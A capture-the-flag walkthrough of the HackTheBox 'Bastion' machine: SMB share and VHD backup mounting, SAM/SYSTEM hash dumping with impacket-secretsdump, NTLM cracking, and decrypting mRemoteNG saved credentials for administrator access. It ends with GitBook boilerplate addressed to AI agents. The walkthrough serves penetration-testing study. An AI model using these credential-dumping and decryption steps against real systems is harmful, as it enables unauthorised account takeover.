> For the complete documentation index, see [llms.txt](https://choochisiang.gitbook.io/report/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://choochisiang.gitbook.io/report/hackthebox/bastion-easy.md). # Bastion (Easy) ## Enumeration ### Nmap ``` nmap -sC -sV -oA nmap/10.10.10.134 10.10.10.134 ``` ``` Nmap scan report for 10.10.10.134 Host is up (0.12s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA) |_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -39m57s, deviation: 1h09m16s, median: 1s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Bastion | NetBIOS computer name: BASTION\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2021-07-12T18:00:27+02:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-07-12T16:00:28 |_ start_date: 2021-07-12T08:13:18 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jul 12 12:00:35 2021 -- 1 IP address (1 host up) scanned in 33.68 seconds ``` We can see that SMB port is up, we can go on and enumerate that. ### SMB ![](/files/-MfwCWNK9uqpIPHWNY_d) We can see there is a Backups shared disk. ![](/files/-MfwCrvaAfn7ItaebzIt) After some digging, we found out that there is 2 vhd file, those files are too big to download it and analyse. ![](/files/-MfwDGeRk1-nux_KeWnj) We can use `mount` command to mount it under our machine. ``` mkdir /mnt/backups sudo mount -t cifs //10.10.10.134/Backups /mnt/backups ``` ![](/files/-MfwExupXp7NzBz65tLs) After that, we can use `guestmount` command to do another mount on the 5gb vhd file. ``` guestmount --add /mnt/backups/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd -v ``` ![](/files/-MfwFIf-nIC5lEdgk4DP) ![](/files/-MfwFpQA-jx1Is2rBJ_D) Mounted to the vhd file ! After that, I searched for the password but found nothing, forum hint us to find under System32 directory. ![](/files/-MfwGlHc56SNjX67p7Tv) We can see that we are able to read SAM and SYSTEM file. By using `impacket` command, we can dump password hashes from there using `secretdump`. We can proceed to copy the SAM and SYSTEM file to our local machine. ``` impacket-secretsdump -sam SAM -system SYSTEM local ``` ![](/files/-MfwHf-r7hVf9oidk9af) We can see there are some hashes popping up. Those are LM hash and NTLM hash. I've tried using crackstation to decrypt each part of the hash. At the end, NTLM hash of user `L4mpje` got the password. ![](/files/-MfwIGBp8M9qpGCxEgtZ) Then we can proceed to login to user `L4mpje`using SSH since port 22 is up. ## User ![](/files/-MfwIvKA9bGz6YGCZe_t) ![](/files/-MfwJ8X9wG3E170vHYlz) ## Privilege Escalation After some enumeration, we can see that mRemoteNG here. ![](/files/-MfwK5N5fZQ9gNrQIOBe) From this [article](https://ethicalhackingguru.com/how-to-exploit-remote-connection-managers/), we can know that it has credentials stored inside **confCons.xml** ![](/files/-MfwKbUUcxneB_4Qsm3n) We can see the administrator hash here. We also can find the hash decryp script at github [here](https://github.com/haseebT/mRemoteNG-Decrypt). ![](/files/-MfwKziMRJ2pTomDr0T2) After decrypt, we got the password and can SSH to administrator. ![](/files/-MfwL8Yr4lBdXZ1nor96) Got Root ! ![](/files/-MfwLL8pxo9LONjr_SBO) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://choochisiang.gitbook.io/report/hackthebox/bastion-easy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.